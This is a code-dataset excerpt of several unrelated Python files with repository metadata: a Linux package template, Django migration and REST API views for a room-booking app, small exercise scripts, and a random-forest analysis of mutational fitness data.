seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
953022142 | pkgname = "libqmi"
pkgver = "1.34.0"
pkgrel = 0
build_style = "meson"
configure_args = [
"-Dqrtr=true",
"-Dintrospection=true",
]
hostmakedepends = [
"bash-completion",
"glib-devel",
"gobject-introspection",
"help2man",
"libgudev-devel",
"libmbim-devel",
"libqrtr-glib-devel",
"meson",
"pkgconf",
]
makedepends = ["glib-devel", "libgudev-devel", "linux-headers"]
pkgdesc = "QMI modem protocol helper library"
maintainer = "q66 <q66@chimera-linux.org>"
license = "GPL-2.0-or-later AND LGPL-2.1-or-later"
url = "https://www.freedesktop.org/wiki/Software/libqmi"
source = f"https://gitlab.freedesktop.org/mobile-broadband/libqmi/-/archive/{pkgver}/libqmi-{pkgver}.tar.gz"
sha256 = "8690d25b4d110b6df28b31da0a8bf16c7e966d31abcfeeb854f2753451e7a400"
@subpackage("libqmi-devel")
def _devel(self):
return self.default_devel()
| chimera-linux/cports | main/libqmi/template.py | template.py | py | 869 | python | en | code | 119 | github-code | 36 |
37219887215 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('community', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='usergiallorosso',
options={'verbose_name': 'Usuario Giallorosso', 'verbose_name_plural': 'Usuarios Giallorossos'},
),
]
| vaquer/ilGiallorosso | ilGiallorosso/community/migrations/0002_auto_20151127_1820.py | 0002_auto_20151127_1820.py | py | 434 | python | en | code | 0 | github-code | 36 |
24060886042 | date = "Monday 2019-03-18"
time = "10:05:34 AM"
average_astronaut_mass_kg = 80.7
fuel_mass_kg = 760000
ship_mass_kg = 74842.31
fuel_level = "100%"
num_astronauts_in_crew = int(input("Enter number of astronauts in crew: "))
crew_status = input("Enter crew status, Ready or Not Ready: ")
total_mass_of_crew = num_astronauts_in_crew * average_astronaut_mass_kg
total_mass_of_ship = total_mass_of_crew + ship_mass_kg + fuel_mass_kg
dashes = "-------------------"
print(f"> LAUNCH CHECKLIST\n{dashes}\nDate: {date}\nTime: {time}\n\n{dashes}\n> SHIP INFO\n{dashes}")
print(f"* Crew: {num_astronauts_in_crew}\n* Crew Status: {crew_status}\n* Fuel Level: {fuel_level}\n\n")
print(f"{dashes}\n> MASS DATA\n{dashes}\n* Crew: {total_mass_of_crew} kg\n* Fuel: {fuel_mass_kg} kg")
print(f"* Spaceship: {ship_mass_kg} kg\n* Total Mass: {total_mass_of_ship} kg")
| SheaCooke/Python_Chapter4_Studio | Chapter4_Studio.py | Chapter4_Studio.py | py | 876 | python | en | code | 0 | github-code | 36 |
4078600392 | class Solution:
def average(self,A,B,start,end):
sum = 0
for i in range(start, end):
sum += A[i]
return sum/B
def solve1(self, A, B):
least_avg = 999999999
min_idx = 0
for i in range(len(A)-B+1):
j = i+B
temp = self.average(A,B,i,j)
if least_avg > temp:
least_avg = temp
min_idx = i
return min_idx
def solve(self, A, B):
least_sum = sum(A[:B])
axu = []
axu.append((least_sum, 0, B-1))
for i in range(B, len(A)):
least_sum = least_sum+A[i]-A[i-B]
print(least_sum, end = " ")
axu.append((least_sum,i-B+1, i))
avg = axu[0][0]/B
idx = axu[0][1]
for i in range(1, len(axu)):
if axu[i][0]/B < avg:
avg = axu[i][0]/B
idx = axu[i][1]
return idx,avg
def solve1(self, A, B):
next_sum = sum(A[:B])
idx = 0
min_avg = next_sum/B
for i in range(B, len(A)):
next_sum = next_sum + A[i] - A[i-B]
print(next_sum, end=" ")
if min_avg > next_sum/B:
min_avg = next_sum/B
idx = i-B+1
return idx, min_avg
A = [ 18, 11, 16, 19, 11, 9, 8, 15, 3, 10, 9, 20, 1, 19 ]
B = 1
A1=[3, 7, 90, 20, 10, 50, 40]
B1=3
A2=[3, 7, 5, 20, -10, 0, 12]
B2=2
A3 =[ 15, 7, 11, 7, 9, 8, 18, 1, 16, 18, 6, 1, 1, 4, 18 ]
B3 = 6
print(Solution().solve(A3, B3))
print(Solution().solve1(A3, B3)) | VishalDeoPrasad/InterviewBit | 01. Arrays/Subarray with least average.py | Subarray with least average.py | py | 1,586 | python | en | code | 1 | github-code | 36 |
22501232171 | """ Module to implement Views for all API Queries"""
from rest_framework.views import APIView
from rest_framework.authentication import TokenAuthentication
from rest_framework.permissions import IsAuthenticated
from rest_framework.authtoken.models import Token
from rest_framework import serializers
from rest_framework.response import Response
from rest_framework import status, generics
from django.shortcuts import get_object_or_404
from django.contrib.auth import authenticate
from django.contrib.auth.models import Group
from .serializers import UserSerializer, CustomerSerializer, ManagerSerializer, AdminSerializer, RoomSerializer, SlotSerializer, ReservationLinkSerializer, ReservationSerializer, ActiveReservationSerializer, EmployeeIDSerializer
from users.models import User, Customer, Manager, Admin, EmployeeID
from users.constants import EMPLOYEE_PREFIXES
from manager_iface.models import Room, Slot
from customer_iface.utilities import send_generated_key
from customer_iface.models import IsolatedResData, Reservation
from datetime import datetime
class GenerateAuthToken(APIView):
""" Class based view to display how to create an API Authentication Token by GET request
and Generate a token if user is admin by POST request
"""
def get(self, request):
ret = dict()
ret['message'] = "Obtain or view your API Authentication Token if you are an admin by sending a POST request to this URL"
ret['format'] = "Required JSON format - {'email':<your_email_id>, 'password':<your_password>}"
ret['example'] = "{'email':'admin@gmail.com', 'password':'secret'}"
return Response(ret, status=status.HTTP_200_OK)
def post(self, request, *args, **kwargs):
email = request.data['email']
password = request.data['password']
# Getting User
try:
this_user = User.objects.get(email=email)
except User.DoesNotExist:
return Response({'error':"User Not Found"}, status=status.HTTP_404_NOT_FOUND)
# Verifying Password
cnf_user = authenticate(email=this_user.email, password=password)
if(cnf_user):
pass
else:
return Response({'error':"Authentication Failed"}, status=status.HTTP_401_UNAUTHORIZED)
# Checking if admin
if(Group.objects.get(user=this_user).name=="AdminPrivilege"):
pass
else:
return Response({'error':"Must be admin"}, status=status.HTTP_401_UNAUTHORIZED)
# Generate and return authentication token
token, created = Token.objects.get_or_create(user=this_user)
return Response({
'token': token.key,
'email': this_user.email
}, status=status.HTTP_200_OK)
class UserHandler(APIView): # For a list of users
""" Class based API View to handle listing of users
"""
serializer_class = UserSerializer
queryset = User.objects.all()
def get(self, request, format=None):
users = User.objects.all()
serializer = UserSerializer(users, many=True, context={'request':request}) # Since there can be multiple users
return Response(serializer.data)
# CANNOT CREATE USER DIRECTLY, HAS TO BE CUSTOMER, MANAGER or ADMIN
class UserDetail(generics.RetrieveAPIView): # Read-Only for an individual user
""" Class based API View to display and delete specific User instance
details thrugh GET and DELETE requests
"""
queryset = User.objects.all()
serializer_class = UserSerializer
lookup_field = 'id'
def delete(self, request, id):
try:
user = User.objects.get(id=id)
except User.DoesNotExist:
return Response({"message": "User not found."}, status=404)
else:
user.delete()
return Response({"message": "User and relevant data have been deleted."}, status=204)
class CustomerHandler(APIView): # For a list of users
""" Class based API View to handle listing and creation of Customers
through GET and POST reqquests
"""
serializer_class = CustomerSerializer
queryset = Customer.objects.all()
def get(self, request, format=None):
users = Customer.objects.all()
serializer = CustomerSerializer(users, many=True, context={'request':request}) # Since there can be multiple users
return Response(serializer.data)
def post(self, request, format=None):
user_data = dict()
user_data['email'] = request.data.pop('email')
user_data['name'] = request.data.pop('name')
user_data['password'] = request.data.pop('password', None) # Password Required is tested here
if(not user_data['password']):
return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
if(user_serial.is_valid()):
serializer = (self.serializer_class)(data=request.data, context={'request':request})
if(serializer.is_valid()):
user_serial.save(is_staff=False, is_superuser=False) # Saving if both serializers are valid
user = User.objects.get(email=user_data['email'])
serializer.save(instance=user)
cust_group = Group.objects.get(name="CustomerPrivilege") # Adding to Customer Group
cust_group.user_set.add(user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
err = serializer.errors
else:
err = user_serial.errors
return Response(err, status=status.HTTP_400_BAD_REQUEST)
class CustomerDetail(generics.RetrieveDestroyAPIView): # Read-Only for an individual customer
""" Class based API View to display and delete specific Customer user
details thrugh GET and DELETE requests
"""
queryset = Customer.objects.all()
serializer_class = CustomerSerializer
custom_lookup_field = 'id'
def get_object(self): # OVERRIDING the get_object method to pdefine customised object lookup
queryset = User.objects.all()
filter = dict()
field = self.custom_lookup_field
filter[field] = self.kwargs[field]
user = get_object_or_404(queryset, **filter)
self.check_object_permissions(self.request, user)
return user.customer
def delete(self, request, id):
try:
user = User.objects.get(id=id)
except User.DoesNotExist:
return Response({"message": "Customer not found."}, status=404)
else:
user.delete()
return Response({"message": "Customer and relevant data have been deleted."}, status=204)
class ManagerHandler(APIView): # For a list of users
""" Class based API View to handle listing and creation of Managers
through GET and POST requests
"""
serializer_class = ManagerSerializer
queryset = Manager.objects.all()
def id_exists(self,value): # TO VERIFY IF EMP_ID IS ALREADY ASSIGNED TO SOMEONE
if(Manager.objects.filter(emp_id=value).count()==0):
return False
else:
return True
def id_valid(self,value): # TO VERIFY ID EMP_ID IS VALID
existing_ids = tuple(map(str,EmployeeID.objects.all()))
if(value in existing_ids):
if(value[:3]=="MAN"): # Must be manager type employee ID
return True
else:
return False
else:
return False
def get(self, request, format=None):
users = Manager.objects.all()
serializer = ManagerSerializer(users, many=True, context={'request':request}) # Since there can be multiple users
return Response(serializer.data)
def post(self, request, format=None):
user_data = dict()
user_data['email'] = request.data.pop('email')
user_data['name'] = request.data.pop('name')
user_data['password'] = request.data.pop('password', None) # Password Required is tested here
if(not user_data['password']): # PASSWORD AND EMP_ID CHECKED HERE
return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
id_check = request.data.pop('emp_id', None)
if(not id_check):
return Response({"error":"Employee ID is required"}, status=status.HTTP_400_BAD_REQUEST)
if((self.id_exists(id_check)) or (not self.id_valid(id_check))):
return Response({"error":"Employee ID is invalid"}, status=status.HTTP_400_BAD_REQUEST)
empid_inst = EmployeeID.objects.get(emp_id=id_check) # GETTING EMPLOYEE_ID RECORD OBJECT
user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
if(user_serial.is_valid()):
serializer = (self.serializer_class)(data=request.data, context={'request':request})
if(serializer.is_valid()):
user_serial.save(is_staff=True, is_superuser=False)
user = User.objects.get(email=user_data['email']) # Saving after both serializers are valid
empid_inst.assignee = user
empid_inst.save() # Setting assignee for employee id instance
serializer.save(instance=user, emp_id=empid_inst) # Saving User and Employee ID instances
manager_group = Group.objects.get(name="ManagerPrivilege") # Adding to Manager Group
manager_group.user_set.add(user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
err = serializer.errors
else:
err = user_serial.errors
return Response(err, status=status.HTTP_400_BAD_REQUEST)
class ManagerDetail(generics.RetrieveDestroyAPIView): # Read-Only for an individual manager
""" Class based API View to display and delete specific Manager user
details through GET and DELETE requests
"""
queryset = Manager.objects.all()
serializer_class = ManagerSerializer
custom_lookup_field = 'id'
def get_object(self): # OVERRIDING the get_object method to pdefine customised object lookup
queryset = User.objects.all()
filter = dict()
field = self.custom_lookup_field
filter[field] = self.kwargs[field]
user = get_object_or_404(queryset, **filter)
self.check_object_permissions(self.request, user)
return user.manager
def delete(self, request, id):
try:
user = User.objects.get(id=id)
except User.DoesNotExist:
return Response({"message": "Manager not found."}, status=404)
else:
user.delete()
return Response({"message": "Manager and relevant data have been deleted."}, status=204)
class AdminHandler(APIView): # For a list of users
""" Class based API View to handle listing and creation of Admins
through GET and POST reqquests
"""
serializer_class = AdminSerializer
queryset = Admin.objects.all()
def id_exists(self,value): # TO VERIFY IF EMP_ID IS ALREADY ASSIGNED TO SOMEONE
if(Manager.objects.filter(emp_id=value).count()==0):
return False
else:
return True
def id_valid(self,value): # TO VERIFY ID EMP_ID IS VALID
existing_ids = tuple(map(str,EmployeeID.objects.all()))
if(value in existing_ids):
if(value[:3]=="ADM"): # Must be manager type employee ID
return True
else:
return False
else:
return False
def get(self, request, format=None):
users = Admin.objects.all()
serializer = AdminSerializer(users, many=True, context={'request':request}) # Since there can be multiple users
return Response(serializer.data)
def post(self, request, format=None):
user_data = dict()
user_data['email'] = request.data.pop('email')
user_data['name'] = request.data.pop('name')
user_data['password'] = request.data.pop('password', None) # Password Required is tested here
if(not user_data['password']): # PASSWORD AND EMP_ID CHECKED HERE
return Response({"error":"Password is required"}, status=status.HTTP_400_BAD_REQUEST)
id_check = request.data.pop('emp_id', None)
if(not id_check):
return Response({"error":"Employee ID is required"}, status=status.HTTP_400_BAD_REQUEST)
if((self.id_exists(id_check)) or (not self.id_valid(id_check))):
return Response({"error":"Employee ID is invalid"}, status=status.HTTP_400_BAD_REQUEST)
empid_inst = EmployeeID.objects.get(emp_id=id_check) # GETTING EMPLOYEE_ID RECORD OBJECT
user_serial = (UserHandler().serializer_class)(data=user_data, context={'request':request})
if(user_serial.is_valid()):
serializer = (self.serializer_class)(data=request.data, context={'request':request})
if(serializer.is_valid()):
user_serial.save(is_staff=True, is_superuser=True)
user = User.objects.get(email=user_data['email']) # Saving after both serializers are valid
empid_inst.assignee = user
empid_inst.save() # Setting assignee for employee id instance
serializer.save(instance=user, emp_id=empid_inst) # Saving User and Employee ID instances
adm_group = Group.objects.get(name="AdminPrivilege") # Adding to Admin Group
adm_group.user_set.add(user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
err = serializer.errors
else:
err = user_serial.errors
return Response(err, status=status.HTTP_400_BAD_REQUEST)
class AdminDetail(generics.RetrieveDestroyAPIView): # Read-Only for an individual manager
""" Class based API View to display and delete specific Admin user
details thrugh GET and DELETE requests
"""
queryset = Admin.objects.all()
serializer_class = AdminSerializer
custom_lookup_field = 'id'
def get_object(self): # OVERRIDING the get_object method to pdefine customised object lookup
queryset = User.objects.all()
filter = dict()
field = self.custom_lookup_field
filter[field] = self.kwargs[field]
user = get_object_or_404(queryset, **filter)
self.check_object_permissions(self.request, user)
return user.admin
def delete(self, request, id):
try:
user = User.objects.get(id=id)
except User.DoesNotExist:
return Response({"message": "Admin not found."}, status=404)
else:
user.delete()
return Response({"message": "Admin and relevant data have been deleted."}, status=204)
class EmpidHandler(APIView): # For a list of users
""" Class based API View to handle listing and creation of Employee IDs
through GET and POST reqquests
"""
serializer_class = EmployeeIDSerializer
queryset = EmployeeID.objects.all()
def get(self, request, format=None):
ids = EmployeeID.objects.all()
serializer = EmployeeIDSerializer(ids, many=True, context={'request':request}) # Since there can be multiple users
return Response(serializer.data)
def post(self, request, format=None):
emp_type = request.data['emp_type']
creator = request.user # Will be an Admin User only (Permission Controlled)
serializer = (self.serializer_class)(data=request.data, context={'request':request})
if(serializer.is_valid()): # Setting assignee for employee id instance
pre = EMPLOYEE_PREFIXES[emp_type] #GENERATING EMPLOYEE ID
gen_empid = pre+(str(EmployeeID.objects.filter(emp_type=emp_type).count()+1).rjust(3,'0'))
serializer.save(emp_id=gen_empid, creator=creator)
empid_inst = EmployeeID.objects.get(emp_id=gen_empid)
send_generated_key(empid_inst) # SEND AN EMAIL to ADMIN
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
err = user_serial.errors
return Response(err, status=status.HTTP_400_BAD_REQUEST)
class EmpidDetail(generics.RetrieveDestroyAPIView): # Read-Only for an individual manager
""" Class based API View to display and delete specific Employee ID
details thrugh GET and DELETE requests. Deleteion only results in deletion of
the concerned employee User and his rooms but retains ID instance for reuse
"""
queryset = EmployeeID.objects.all()
serializer_class = EmployeeIDSerializer
lookup_field = 'emp_id'
def delete(self, request, emp_id):
try:
empid_inst = EmployeeID.objects.get(emp_id=emp_id)
user = empid_inst.assignee
except User.DoesNotExist:
return Response({"message": "Employee ID not found."}, status=404)
else:
user.delete()
empid_inst.assignee = None
empid_inst.save() # Delete the employee, unassign employee ID, but the ID is AVAILABLE FOR REUSE
return Response({"message": "Emplyee Deleted. ID Avalaible for Re-Assignment"}, status=204)
class RoomHandler(generics.RetrieveAPIView):
""" Class based API View to display and delete specific Room
details through GET and DELETE requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = Room.objects.all()
def get(self, request, format=None):
rooms = Room.objects.all()
serializer = RoomSerializer(rooms, many=True, context={'request':request})
return Response(serializer.data)
class RoomDetail(generics.RetrieveDestroyAPIView): # Read-Only for an individual user
""" Class based API View to display and delete specific Room
details thrugh GET and DELETE requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = Room.objects.all()
serializer_class = RoomSerializer
lookup_field = 'room_no'
def delete(self, request, room_no): # Overriding the default delete method
this_room = self.queryset.get(room_no=room_no)
# Simoultaneously setting status as Cancelled in Isolated Reservation Data
# This is done using a pre_delete signal attached to Reservation model
this_room.delete()
return Response({"message": "Room and relevant data have been deleted."}, status=204)
class SlotHandler(generics.RetrieveAPIView):
""" Class based API View to handle listing of Slots for rooms
through GET requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = Slot.objects.all()
def get(self, request, format=None):
slots = Slot.objects.all()
serializer = SlotSerializer(slots, many=True, context={'request':request})
return Response(serializer.data)
class SlotDetail(generics.RetrieveDestroyAPIView):
""" Class based API View to display and delete specific Slot
details thrugh GET and DELETE requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = Slot.objects.all()
serializer_class = SlotSerializer
lookup_field = 'id'
def delete(self, request, id): # Overriding the default delete method
this_slot = self.queryset.get(id=id)
# Simoultaneously setting status as Cancelled in Isolated Reservation Data
# This is done using a pre_delete signal attached to Reservation model
this_slot.delete()
return Response({"message": "Slot and relevant data have been deleted."}, status=204)
class AllReservations(APIView): # For a list of users
""" Class based API View to handle listing all reservation type (past, future, etc)
URLs through GET requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
reserves = User.objects.filter(email=request.user.email) # Dummy QuerySet with on Entry
serializer = ReservationLinkSerializer(reserves, many=True, context={'request':request})
return Response(serializer.data)
class PastReservations(APIView): # For a list of users
""" Class based API View to handle listing past reservations
through GET request
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
today = datetime.date(datetime.now())
now = datetime.time(datetime.now())
reserves = IsolatedResData.objects.filter( date__lt=today,
status="Active")|( IsolatedResData.objects.filter( date=today,
end_time__lt=now,
status="Active"))
serializer = ReservationSerializer(reserves, many=True, context={'request':request})
return Response(serializer.data)
class FutureReservations(APIView): # For a list of users
""" Class based API View to handle listing future reservations
through GET requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
today = datetime.date(datetime.now())
now = datetime.time(datetime.now())
reserves = Reservation.objects.filter( date__gt=today)|( Reservation.objects.filter( date=today,
slot__start_time__gt=now)) # All reservations in this model are "Active"
serializer = ActiveReservationSerializer(reserves, many=True, context={'request':request})
return Response(serializer.data)
class OngoingReservations(APIView): # For a list of users
""" Class based API View to handle listing currently occupied reservations
through GET requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
today = datetime.date(datetime.now())
now = datetime.time(datetime.now())
reserves = IsolatedResData.objects.filter( date=today,
start_time__lte=now,
status="Active")|( IsolatedResData.objects.filter( date=today,
end_time__gte=now,
status="Active"))
serializer = ReservationSerializer(reserves, many=True, context={'request':request})
return Response(serializer.data)
class CancelledReservations(APIView): # For a list of users
""" Class based API View to handle listing cancelled reservations
through GET requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
def get(self, request, format=None):
reserves = IsolatedResData.objects.filter(status='Cancelled')
serializer = ReservationSerializer(reserves, many=True, context={'request':request})
return Response(serializer.data)
class InactiveReservationDetail(generics.RetrieveAPIView): # Read-Only for an individual user
""" Class based API View to display individual Reservation
trhough GET requests, either in Past or Cancelled
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = IsolatedResData.objects.all()
serializer_class = ReservationSerializer
lookup_field = 'id'
class ActiveReservationManage(generics.RetrieveDestroyAPIView):
""" Class based API View to handle deletion and display of a specific Reservations
through GET and DELETE requests
"""
authentication_classes = [TokenAuthentication]
permission_classes = [IsAuthenticated]
queryset = Reservation.objects.all()
serializer_class = ActiveReservationSerializer
lookup_field = 'id'
def delete(self, request, id): # Overriding the default delete method
this_reserve = self.queryset.get(id=id)
# Simoultaneously setting status as Cancelled in Isolated Reservation Data
# This is done using a pre_delete signal attached to Reservation model
this_reserve.delete()
return Response({"message": "Reservation has been deleted."}, status=204)
| karthik-d/room-slot-booking | roomBookingManager/api/views.py | views.py | py | 22,909 | python | en | code | 4 | github-code | 36 |
2884245779 | # coding:utf-8
# @Time : 2019-04-28 11:13
# @Author: Xiawang
from utils.util import delete_requests, get_app_header
host = 'https://gate.lagou.com/v1/entry'
header = get_app_header(100018934)
def delete_orderId(orderIds):
url = host + '/order/orderId?orderIds={orderIds}'.format(orderIds=orderIds)
remark = '删除投递记录'
return delete_requests(url=url, remark=remark)
| Ariaxie-1985/aria | api_script/entry/order/orderId.py | orderId.py | py | 391 | python | en | code | 0 | github-code | 36 |
16830841390 | #!/usr/bin/env python
# coding: utf-8
# # Random forest DMS
#
# This script runs the random forest model on the data from the differences in fitness effects: deltaS_weak (S_weak - S_opt)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import Lasso
from sklearn.linear_model import Ridge
from sklearn.tree import DecisionTreeRegressor
from IPython.display import HTML
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score
from sklearn.preprocessing import PolynomialFeatures
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from statistics import mean
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import mean_squared_error
from sklearn.metrics import accuracy_score
from rfpimp import permutation_importances
from sklearn.base import clone
from sklearn import tree
import graphviz
from sklearn.tree import _tree
import sklearn
sklearn.__version__
dataset = pd.read_csv('../../Data/Complete_datasets/dataset_diffNorm_ara0.2_ara0.01_index_differences.txt', sep='\t')
dataset
# Remove stop codons and rows that are not present in the PDB structure
dataset = dataset[(dataset['Residue'] != '*') &
(pd.notna(dataset['Mean_ddG_stab_HET'])) &
(pd.notna(dataset['diffNormScore']))
]
df = dataset.drop(['Entropy','Position','WT_Residue', 'Residue', 'Arabinose',
'Secondary_structure','Solvent_accessibility', 'mean_sel_coeff',
'mean_sel_coeff_2', 'Arabinose_2'],axis=1)
df
X = df.drop(['diffNormScore'],axis=1)
Y = df['diffNormScore']
# Normalize all the features to the range of -1 , 1
X = X / X.max()
## Train a random forest model
X_train,X_test,y_train,y_test =train_test_split(X,Y,test_size=0.2, random_state=100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))
## Train the random forest again but adding a random variable
np.random.seed(100)
X['random_var'] = np.random.normal(loc = 0, scale = 1, size = X.shape[0])
X_train,X_test,y_train,y_test =train_test_split(X,Y,test_size=0.2, random_state = 100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))
# Use cross-validation on this preliminary model
cross_val_n = 5
print('Five-fold cross validation of the random forest model:')
cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n , scoring = r2)
print(cross_validations)
print(np.mean(cross_validations), np.std(cross_validations) / np.sqrt(cross_val_n))
print('------')
cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=5, scoring = r2)
print(cross_validations)
## Check cross-validation accuracy
cross_validations_pred = cross_val_predict(estimator = model_rf, X = X_train, y = y_train, cv=5)
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(cross_validations_pred, y_train)
ax.set_xlabel('Predicted deltaS (random forest, cross-validations)', fontsize = 20)
ax.set_ylabel('Observed deltaS', fontsize = 20)
cross_validations_pred[1, ]
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
plt.show()
# Figures for the accuracy of the predictions and selecting the best variables
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(pred_test_rf, y_test)
ax.set_xlabel('Predicted fitness effects (random forest)', fontsize = 20)
ax.set_ylabel('Observed fitness effects', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
plt.show()
## Save the corresponding files for predictions on validation set and test set
## Results with all variables
df_pred_test = pd.DataFrame(list(zip(y_test, pred_test_rf)), columns = ['test_data', 'pred_data'])
df_pred_test.to_csv('../../Data/Random_forest_results/diffNorm_ara0.2_ara0.01/pred_rf_allVariables.txt', sep = '\t')
## Results of predictions in the cross-validation
df_pred_crossval = pd.DataFrame(list(zip(y_train, cross_validations_pred)), columns = ['test_data', 'pred_data'])
df_pred_crossval.to_csv('../../Data/Random_forest_results/diffNorm_ara0.2_ara0.01/crossval_rf_allVariables.txt', sep = '\t')
# ## Feature selection
# Define a function to use permutation to estimate relative importances
def r2(rf, X_train, y_train):
return r2_score(y_train, rf.predict(X_train))
# Use permutation to estimate relative importances
perm_imp_rfpimp = permutation_importances(model_rf, X_train, y_train, r2)
get_ipython().run_line_magic('matplotlib', 'inline')
fig = plt.figure()
ax = fig.add_axes([0,0,1,3])
ax.barh(list(perm_imp_rfpimp.index), perm_imp_rfpimp['Importance'])
ax.set_xlabel('Relative importance', fontsize = 20)
ax.set_ylabel('Feature', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
plt.show()
best_features = perm_imp_rfpimp[perm_imp_rfpimp['Importance'] >= perm_imp_rfpimp['Importance']['random_var']]
best_features
new_X = X[list(best_features.index)]
# Train a new random forest with the selected variables and the random variable
X_train,X_test,y_train,y_test =train_test_split(new_X,Y,test_size=0.2, random_state = 100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(pred_test_rf, y_test)
ax.set_xlabel('Predicted fitness effects (random forest)', fontsize = 20)
ax.set_ylabel('Observed fitness effects', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
plt.show()
# Cross-validation
cross_val_n = 5
print('Five-fold cross validation of the random forest model:')
cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n, scoring = r2)
print(cross_validations)
print(np.mean(cross_validations), np.std(cross_validations) / np.sqrt(cross_val_n))
print('------')
cross_validations_pred = cross_val_predict(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n)
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(cross_validations_pred, y_train)
ax.set_xlabel('Predicted deltaS (random forest, cross-validations)', fontsize = 20)
ax.set_ylabel('Observed deltaS', fontsize = 20)
cross_validations_pred[1, ]
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(14)
plt.show()
# Since this is a simpler model, we can test relative importance by leaving one
# variable out and retraining
# Function from https://explained.ai/rf-importance/index.html#intro
def dropcol_importances(rf, X_train, y_train):
rf_ = clone(rf)
rf_.random_state = 100
rf_.fit(X_train, y_train)
baseline = rf_.oob_score_
imp = []
for col in X_train.columns:
X = X_train.drop(col, axis=1)
rf_ = clone(rf)
rf_.random_state = 100
rf_.fit(X, y_train)
o = rf_.oob_score_
imp.append(baseline - o)
imp = np.array(imp)
I = pd.DataFrame(
data={'Feature':X_train.columns,
'Importance':imp})
I = I.set_index('Feature')
I = I.sort_values('Importance', ascending=True)
return I
importances_drop_col = dropcol_importances(model_rf, X_train, y_train)
get_ipython().run_line_magic('matplotlib', 'inline')
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.barh(list(importances_drop_col.index), importances_drop_col['Importance'])
ax.set_xlabel('Relative importance', fontsize = 16)
ax.set_ylabel('Feature', fontsize = 16)
